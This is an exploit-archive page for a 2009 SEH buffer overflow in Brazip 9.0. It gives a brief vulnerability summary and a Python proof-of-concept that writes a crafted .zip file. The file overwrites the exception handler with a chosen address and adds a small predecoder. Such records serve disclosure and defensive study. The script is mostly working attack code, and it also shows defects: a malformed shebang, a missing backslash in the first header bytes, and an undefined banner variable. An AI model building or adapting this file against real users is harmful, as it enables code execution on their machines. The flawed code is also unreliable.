header-logo
Suggest Exploit
vendor:
Brazip
by:
ITSecTeam
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Brazip
Affected Version From: 9.0
Affected Version To: 9.0
Patch Exists: YES
Related CWE: N/A
CPE: a:brazip:brazip:9.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP1/SP3 EN
2009

Brazip 9.0 (.zip File) BoF Poc (SEH)

A buffer overflow vulnerability exists in Brazip 9.0 when handling .zip files. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. This vulnerability is due to a lack of proper validation of user-supplied input when handling .zip files. An attacker can exploit this vulnerability by enticing a user to open a specially crafted .zip file. Successful exploitation could result in arbitrary code execution in the context of the application.

Mitigation:

Upgrade to the latest version of Brazip 9.0
Source

Exploit-DB raw data:

#!user/bin/python
######################################################################
# Brazip 9.0 (.zip File) BoF Poc (SEH) 
# Homepage  : www.brazip.com.br
# Version   : 9.0
# Tested Os : Windows XP SP1/SP3 EN 
# Usage     : $ Python Brazip-poc.py
######################################################################
#AUTHOR: ITSecTeam
#Email: Bug@ITSecTeam.com
#Website: http://www.itsecteam.com
#Forum : http://forum.ITSecTeam.com
#Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability60.htm
#Thanks: Hoshang jafari  aka [PLATEN]
######################################################################
import sys
print __banner__

header_1 =("x50\x4B\x03\x04\x14\x00\x00"
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" 
"\x00\x00\x00\x00\x00\x00\x00\x00" 
"\xe4\x0f" 
"\x00\x00\x00")
 
header_2 = ("\x50\x4B\x01\x02\x14\x00\x14"
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xe4\x0f"
"\x00\x00\x00\x00\x00\x00\x01\x00"
"\x24\x00\x00\x00\x00\x00\x00\x00")
 
header_3 = ("\x50\x4B\x05\x06\x00\x00\x00"
"\x00\x01\x00\x01\x00"
"\x12\x10\x00\x00"
"\x02\x10\x00\x00"
"\x00\x00")
nseh="\x41\x41\x41\x41"  
seh="\x65\x47\x7e\x6d"   

payload = "A" * 297 + nseh  + seh

predecoder = "\x59\x59\x59\x51\x5c"
payload=payload+predecoder
filltoebx="B" * (100-len(predecoder))
rest = "C" *  (4064-len(payload+filltoebx)) + ".txt"
payload = payload+filltoebx+rest
exploit = header_1 + payload + header_2 + payload + header_3
 
try:
	f=open("Brazip-poc.zip",'w')
	f.write(exploit)
	f.close()
	print   "[+] File created successfully !" 
	sys.exit(0)
except:
	print "[-] Error cant write file to system\n"

Navigation

Suggest Exploit

Services By CQR